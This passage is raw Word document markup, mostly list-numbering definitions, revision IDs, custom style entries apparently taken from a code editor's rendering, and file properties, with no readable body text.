    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="8996923">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1647395371">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1577393549">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="854881165">
    <w:abstractNumId w:val="54"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="70978304">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1421491006">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1969045467">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1812558490">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1240678771">
    <w:abstractNumId w:val="43"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="288511170">
    <w:abstractNumId w:val="72"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="979386759">
    <w:abstractNumId w:val="59"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="41098060">
    <w:abstractNumId w:val="69"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="351804650">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="980840116">
    <w:abstractNumId w:val="70"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1214005295">
    <w:abstractNumId w:val="48"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="365065343">
    <w:abstractNumId w:val="44"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1462919594">
    <w:abstractNumId w:val="37"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="820467049">
    <w:abstractNumId w:val="13"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1148325549">
    <w:abstractNumId w:val="67"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="2063020151">
    <w:abstractNumId w:val="73"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1205753615">
    <w:abstractNumId w:val="31"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="63459728">
    <w:abstractNumId w:val="63"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="511604375">
    <w:abstractNumId w:val="9"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="1267270105">
    <w:abstractNumId w:val="47"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="562956038">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="753938002">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="2041083089">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="382410681">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="1077752711">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1691376873">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="1511335775">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="235896133">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="243690438">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="546571642">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="930167567">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="1755128331">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="1504517224">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="107896456">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="1859731709">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="2099326729">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="311524193">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="1260677393">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="326398850">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="9816923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94"/>
    <w:rsid w:val="00035225"/>
    <w:rsid w:val="00215A64"/>
    <w:rsid w:val="004007AE"/>
    <w:rsid w:val="00587F03"/>
    <w:rsid w:val="006D3994"/>
    <w:rsid w:val="007B0565"/>
    <w:rsid w:val="008C7AA7"/>
    <w:rsid w:val="009B71D0"/>
    <w:rsid w:val="009F5B20"/>
    <w:rsid w:val="00A61488"/>
    <w:rsid w:val="00E45E03"/>
    <w:rsid w:val="00E87080"/>
    <w:rsid w:val="00EA3E76"/>
    <w:rsid w:val="00FB23D1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FC63"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EE205601-FE5D-5444-9BE4-19103307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3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3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3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99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D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nysphere-markdown-container-root">
    <w:name w:val="anysphere-markdown-container-root"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="markdown-bold-text">
    <w:name w:val="markdown-bold-text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="composer-code-block-file-icon">
    <w:name w:val="composer-code-block-file-icon"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="composer-code-block-filename">
    <w:name w:val="composer-code-block-filename"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codicon">
    <w:name w:val="codicon"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk14">
    <w:name w:val="mtk14"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk4">
    <w:name w:val="mtk4"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk1">
    <w:name w:val="mtk1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk10">
    <w:name w:val="mtk10"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk9">
    <w:name w:val="mtk9"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk5">
    <w:name w:val="mtk5"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk13">
    <w:name w:val="mtk13"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="markdown-inline-code">
    <w:name w:val="markdown-inline-code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="nested">
    <w:name w:val="nested"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006D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tk11">
    <w:name w:val="mtk11"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk7">
    <w:name w:val="mtk7"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mtk16">
    <w:name w:val="mtk16"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006D3994"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006D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007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07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7A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8915</Words>
  <Characters>50816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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-26T20:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-27T01:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>